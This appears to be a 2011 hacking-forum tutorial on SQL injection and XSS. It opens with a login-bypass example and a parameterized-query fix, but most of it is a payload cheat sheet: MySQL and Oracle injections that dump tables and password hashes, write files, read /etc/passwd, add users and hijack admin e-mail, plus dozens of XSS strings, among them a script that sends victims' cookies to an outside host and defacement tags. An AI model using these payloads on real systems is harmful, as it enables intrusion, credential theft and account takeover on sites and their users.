
SQL INJECTION , XSS

yahoo2010
http://ashiyane.org/forums
Y!: ali_rezamilan
1390/06/06


Contents
2. SQL injection
3. XSS

SQL Injection

Consider a login page where the Login ID and Password typed by the user are placed straight into the SQL query. In the application, UserID and Password are TextBox controls and the query text is built by string concatenation:

"SELECT COUNT(UserID) FROM tblUsers WHERE UserID='" & UserID.Text & "' AND Pass='" & Password.Text & "'"

For the user mahdi with password 123 the resulting SQL is:

SELECT COUNT(UserID) FROM tblUsers WHERE UserID='mahdi' AND Pass='123'

If the attacker instead enters the following as the login ID:

' OR 1=1

the SQL becomes:

SELECT COUNT(UserID) FROM tblUsers WHERE UserID='' OR 1=1 AND Pass=''

The condition UserID='' OR 1=1 is always true, so the count is greater than zero and the attacker is authenticated without knowing any password.

The fix in ASP.NET (here against SQL Server through OleDb) is a parameterized query instead of concatenation:

Dim strSQL As String = "SELECT COUNT(UserID) FROM tblUsers WHERE UserID=? AND Password=?"
' The OleDb provider does not accept named placeholders in command text; it binds
' parameters positionally, so the Add calls below must follow the order of the ? marks.
Dim cmndCheck As OleDbCommand = New OleDbCommand(strSQL, _Connection)
cmndCheck.Parameters.Add("@UserID", UserID.Text)
cmndCheck.Parameters.Add("@Password", Password.Text)
cmndCheck.Connection.Open()
Dim IsValid As Integer = cmndCheck.ExecuteScalar()
If IsValid > 0 Then
    ' Some code here: user is authenticated
Else
    ' Some code here: user is not authorized to view the page
End If

With parameters, a single quote in the input is just data: it can no longer terminate the string literal and change the SQL. cmndCheck is an OleDbCommand; its ExecuteScalar returns the value of the first column of the first row, i.e. the count. _Connection is the connection object created from the ConnectionString.
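The two login checks above, side by side, as an added example (not code from the original page): Python with an in-memory SQLite table standing in for tblUsers and the page's OR 1=1 string as input. The table contents and function names are assumptions of this example; the point is that the concatenated query accepts the bypass string while the parameterized one does not.

```python
import sqlite3

# Constructed in-memory stand-in for the page's tblUsers (SQLite here; the
# page's code targets SQL Server through OleDb, but the behaviour is the same).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblUsers (UserID TEXT, Pass TEXT)")
    conn.execute("INSERT INTO tblUsers VALUES ('mahdi', '123')")
    conn.commit()
    return conn

def build_concat_sql(user_id, password):
    # Same shape as the page's "& UserID.Text &" concatenation: the user's
    # input becomes part of the SQL text, quotes and all.
    return ("SELECT COUNT(UserID) FROM tblUsers WHERE UserID='" + user_id +
            "' AND Pass='" + password + "'")

def login_concat(conn, user_id, password):
    """Vulnerable check: the query is assembled by string concatenation."""
    return conn.execute(build_concat_sql(user_id, password)).fetchone()[0] > 0

def login_param(conn, user_id, password):
    """Fixed check: constant SQL text, values travel as bound parameters
    (the ? placeholder is sqlite3's; OleDb uses ? as well)."""
    sql = "SELECT COUNT(UserID) FROM tblUsers WHERE UserID=? AND Pass=?"
    return conn.execute(sql, (user_id, password)).fetchone()[0] > 0

if __name__ == "__main__":
    db = make_db()
    attacker = "' OR 1=1 --"   # the page's bypass string, with the quote it needs
    print(build_concat_sql(attacker, "x"))
    print("concat:", login_concat(db, attacker, "x"))   # authenticated: True
    print("params:", login_param(db, attacker, "x"))    # rejected: False
```

Run it directly to see the assembled query; the trailing -- turns the rest of the concatenated statement into a comment, which is why the password check disappears.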



XSS

XSS stands for Cross Site Scripting. It is abbreviated XSS rather than CSS so that it is not confused with CSS, Cascading Style Sheets.

The simplest case is a value from the query string that the page echoes back into its HTML:

http://www.folan.com/login.php?bahman=

If whatever is passed in bahman is written into the page without encoding, the browser renders it as HTML:

http://www.folan.com/login?bahman=<h1>salam</h1>

Script can be injected the same way, for example to send the victim's cookie to another host:

http://foloan/bahman.php?n=<script>document.location.replace('http://nofozgar/begir?borohalakon='+document.cookie)</script>
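The reflection point described above, with its fix, as an added example that is not part of the original page: a Python rendering function that pastes the bahman parameter into the page unencoded beside one that HTML-encodes it at output, plus a Set-Cookie value with HttpOnly so that document.cookie cannot read the session even if script does run. The URLs, parameter name and function names are assumptions of this example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request URLs (assumptions of this example) mirroring the
# reflection cases above: a plain value, HTML markup, and script.
BENIGN = "http://www.folan.com/login.php?bahman=salam"
MARKUP = "http://www.folan.com/login.php?bahman=<h1>salam</h1>"
SCRIPT = ("http://www.folan.com/login.php?bahman=<script>document.location"
          ".replace('http://nofozgar/begir?borohalakon='%2Bdocument.cookie)</script>")

def param(url, name):
    """Return one query-string parameter (URL-decoded), or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]

def render_unsafe(url):
    # Vulnerable: the raw parameter is pasted into the HTML body, so <h1>
    # and <script> reach the browser as markup.
    return "<p>Hello " + param(url, "bahman") + "</p>"

def render_safe(url):
    # Fixed: encode at the point of output. quote=True also encodes ' and ",
    # so the same value is safe inside an attribute, not only between tags.
    return "<p>Hello " + html.escape(param(url, "bahman"), quote=True) + "</p>"

def session_cookie(value):
    # Defence in depth: HttpOnly hides the cookie from document.cookie,
    # Secure limits it to HTTPS, SameSite reduces cross-site sending.
    return "session=" + value + "; HttpOnly; Secure; SameSite=Lax; Path=/"

if __name__ == "__main__":
    for url in (BENIGN, MARKUP, SCRIPT):
        print("unsafe:", render_unsafe(url))
        print("safe:  ", render_safe(url))
    print("Set-Cookie:", session_cookie("0123abcd"))
```

Encoding belongs at the output point, chosen for the context the value lands in (HTML body here); the cookie flag is a second layer, not a substitute for it.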

SQL PHP WITH BYPASS

-999/**/order/**/by/**/column/*
-999/**/and/**/1=0/**/union/**/all/**/select/**/column/*
-999+order+by+column--
-999+and+1=0+union+all+select+column--
-999+and+1=0+union+all+select+column+from+user--
Note: on MySQL version 4 the table names have to be guessed: from+user or users or ...
-999+and+1=0+union+all+select+column(1,2,user,password)+from+users--
-999/**/and/**/1=0/**/Union/**/all/**/Select+column/**/from+iNformatTion_Schema--

To get tables:
999+and+1=0+Union+all+Select+column+(table_name)+from+iNformatTion_Schema.tables--

To get tables with bypass:
999/**/and/**/1=0/**/Union/**/all+Select/**/column+(table_name)+from+iNformatTion_Schema.tables--

To get tables with group_concat:
999+and+1=0+Union+all+Select+column+group_concat(table_name)+from+iNformatTio n_Schema.tables--

Note: to get the columns, put (column_name) and information_schema.columns in place of (table_name) and information_schema.tables.

Illegal in Command:
999+Union+Select+all+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8+from+iNformation_schema.columns--
999+Union+Select+all+1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8+from+iNformation_schema.tables--

SQL ASP

'having 1=1--

Enter it in the login or username field, then log in.

First table, for example:

b2b_supplier_id
b2b_supplier_loginname

'group by b2b_supplier_id having 1=1-- (enter it in the login or username field again and log in to obtain the next table)

'group by b2b_supplier_id,b2b_supplier_loginname having 1=1-- (continue in the same way until the last table is obtained)

Note: keep going until it no longer returns an error.

MYSQL INJECTION COMMAND

Basics

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors

Operators :

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate (all render TRUE or 1):
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math :
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc :
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark :
SELECT BENCHMARK(10000000,ENCODE('abc','123'));

this takes around 5 sec on a localhost


SELECT BENCHMARK(1000000,MD5(CHAR(116)))

this takes around 7 sec on a localhost


SELECT BENCHMARK(10000000,MD5(CHAR(116)))

this takes around 70 sec on a localhost


Using the timeout to check if user exists :
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Gathering info

Table mapping:
SELECT COUNT(*) FROM tablename

Field mapping:
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping :
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors:

Writing info into files


SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)


SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
INTO
OUTFILE
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

The CHAR() quoteless function

SELECT * FROM login WHERE user =


CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes :
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

Example :
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'


UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (password field,start character,select length) :

is like: (password,1,2) this selects: ab


is like: (password,1,3) this selects: abc
is like: (password,1,4) this selects: abcd

A quoteless example :
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

ASCII: 0 to 9 = 48 to 57; a to z = 97 to 122

Misc:

Insert a new user into DB :


INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user :
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user
=
'r00t', pass = 'abc'

Then login !
Write the DB user away into tmp :
SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for forgot login retrieval.


UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions:

(MySQL 4.1.x before 4.1.20 and 5.0.x)


Bypassing addslashes() with GBK encoding:
WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK:
"injection string"

The above chars are Chinese Big5. Both tricks depend on the escaping function and the database connection disagreeing about the character set, so the defence is to set the charset on the connection itself (mysql_set_charset() rather than SET NAMES) and to use prepared statements.

Advanced vectors:


Using an HEX encoded query to bypass escaping :
Normal :
SELECT * FROM login WHERE user = 'root'

Bypass :
SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL :


Normal :

insert into login set user = root, pass = root


Bypass :

insert into login set user = 0x726F6F74, pass = 0x726F6F74


How to determine the HEX value for injection:
SELECT HEX('root');

gives you :
726F6F74

then add :
0x

Updating the database through a MySQL injection

Table USER, column USERNAME:
WWW.SITE.COM/INDEX.PHP?ID=42 update+user+set+username=alireza--

Column password (e10adc3949ba59abbe56e057f20f883e is the MD5 hash of 123456):
WWW.SITE.COM/INDEX.PHP?ID=42 update+user+set+password=e10adc3949ba59abbe56e057f20f883e--

Oracle SQL Injection in web applications

Common SQL Injection Strings for Oracle Databases

String 1:
' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
Display the database version information in an error message (injected into a string)
[low privilege]
Common problems: Java not installed; Oracle 11g ACL; PUBLIC privilege removed
==> use an alternative function

String 2:
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
Display the database version information in an error message (injected into an integer)
[low privilege]
Common problems: Java not installed; Oracle 11g ACL; PUBLIC privilege removed
==> use an alternative function

String 3:
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))--
Display a list of all usernames (11g only)
[low privilege]
If stragg is not available, it is possible to do the same using XMLDB. stragg is limited to 4096 bytes.

String 4:
or 1=utl_inaddr.get_host_address((Select granted_role from ( select rownum r, granted_role from user_role_privs) where r=1))
Get the privileges of this account. Iterate via r=1, r=2, r=3, ...
[low privilege]
Common problems: No

String 5:
or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA') FROM dual))
or 1=utl_inaddr.get_host_address((SELECT sys_context((select chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual))
Check if DBA, result: TRUE or FALSE
[low privilege]
If the usage of single quotes returns an ORA-00911 (invalid character) you should use the second string.

String 6:
or 1=utl_inaddr.get_host_address((select sys.stragg (distinct table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59)) from user_tab_columns order by table_name,column_id))--
Get a list of all user tables including the column name and type
[low privilege]
Common problems: No
Workaround: No

Oracle Common Commands

String concatenation           Description
'a' || 'b'                     concatenate 2 strings together. This syntax can be used for the split-and-balance technique.
concat('a','b')                concatenate 2 strings together via the concat group.
Read files in SELECT statements   TBD

Blind SQL Injection

Generating Oracle error messages containing information

1 or 1 = ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Message: ORA-53044: Invalid Tag: ORACLE DATABASE 11G ENTERPRISE EDITION RELEASE 11.1.0.7.0 PRODUCTION

1 or 1= CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))--
Message: ORA-20000: Oracle Text-Error: DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production does not exists
Walkthrough

A single quote in a parameter produces ORA-01756 ("Anführungsstrich fehlt bei Zeichenfolge", i.e. quoted string not properly terminated), which shows that the backend is Oracle. References for the error:
http://www.google.com/search?q=ora-01756
http://www.techonthenet.com/oracle/errors/ora01756.php

The basic SQL injection strings are
or 1=1--
and UNION SELECT.

String 1:
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Firefox add-ons for editing the POST or GET string in the URL:
https://addons.mozilla.org/de/firefox/addon/web-developer
or
https://addons.mozilla.org/de/firefox/addon/60

Instead of ORA-01756 the response may be ORA-24247 ("Netzwerkzugriff von Access Control List (ACL) abgelehnt"):
ORA-24247: network access denied by access control list (ACL)
utl_inaddr performs DNS lookups, and on 11g its network access is governed by the ACL:
http://psoug.org/reference/utl_inaddr.html

An alternative to utl_inaddr is ctxsys.drithsx.sn:
or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--

The result is ORA-20000: Oracle Text-Fehler (Oracle Text error) DRG-11701, which contains the version string, here 11g, 11.1.0.7.0, taken from v$version by the subquery:
(select banner from v$version where rownum=1)

rownum=1 limits the subquery to a single row, because the function takes a single value; several columns can be joined into one value with || (col1 || col2). Pentesters use rownum to step through the rows one at a time.

On 11g, stragg aggregates all rows into one string, so a whole result set fits in a single error message:
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner) from v$version))--
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||';') from user_role_privs))--

Listing the tables and columns that contain a column named PASSWORD:
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--

This reveals, for example, the table SHOP.SHOPUSER, whose password column can then be read:
or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||';') from shop.shopuser))--

The same strings with utl_inaddr:
or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||';') from user_role_privs))--
or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--
or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||';') from shop.shopuser))--

SQL strings:
'
/
*

XSS (cross site scripting)

<SCRIPT>alert(XSS);</SCRIPT>

<script><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by yahoo2010</img></script>

<script>alert("String.fromCharCode(104, 97, 99, 107, 32, 98, 121, 32, 121, 97, 104, 111, 111, 50, 48, 49, 48)")</script>

><h1><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by yahoo2010</img></h1>

"><iframe src=http://www.google.de>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SC

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav

ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT>alert(/XSS/.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG LOWSRC="javascript:alert('XSS')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IMG SRC='vbscript:msgbox("XSS")'>

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

><script >alert(document.cookie)</script>

%253cscript%253ealert(document.cookie)%253c/script%253e

; alert(document.cookie); var foo=

Special Tnx 2: ashiyane digital Security Team, All Iranian Hackerz

Copyright: ashiyane digital Security team 2011

For more information go to: http://ashiyane.org/